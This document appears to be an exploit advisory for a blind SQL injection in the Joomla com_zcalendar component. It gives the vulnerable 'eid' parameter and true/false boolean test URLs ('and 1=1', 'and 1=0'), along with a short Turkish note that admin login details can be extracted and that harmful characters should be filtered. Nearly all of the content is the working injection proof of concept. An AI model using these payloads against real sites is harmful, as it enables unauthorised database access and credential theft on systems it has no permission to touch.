31 lines
No EOL
965 B
Text
31 lines
No EOL
965 B
Text
<------------------- header data start ------------------- >
|
|
|
|
#############################################################
|
|
# Joomla Component com_zcalendar Blind SQL-injection Vulnerability #
|
|
#############################################################
|
|
|
|
# author : Fl0riX
|
|
|
|
# Name : com_zcalendar
|
|
|
|
# Bug Type : Blind SQL Injection
|
|
|
|
# Infection : Admin login bilgileri al�nabilir.
|
|
|
|
# Demo Vuln. :
|
|
TRUE(+)
|
|
� http://server/index.php?option=com_zcalendar&task=view&vmode=e&eid=236 and 1=1
|
|
FALSE(-)
|
|
� http://server/index.php?option=com_zcalendar&task=view&vmode=e&eid=236 and 1=0
|
|
|
|
# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.
|
|
|
|
#############################################################
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path/index.php?option=com_zcalendar&task=view&vmode=e&eid=[Blind]
|
|
|
|
< -- bug code end of -- > |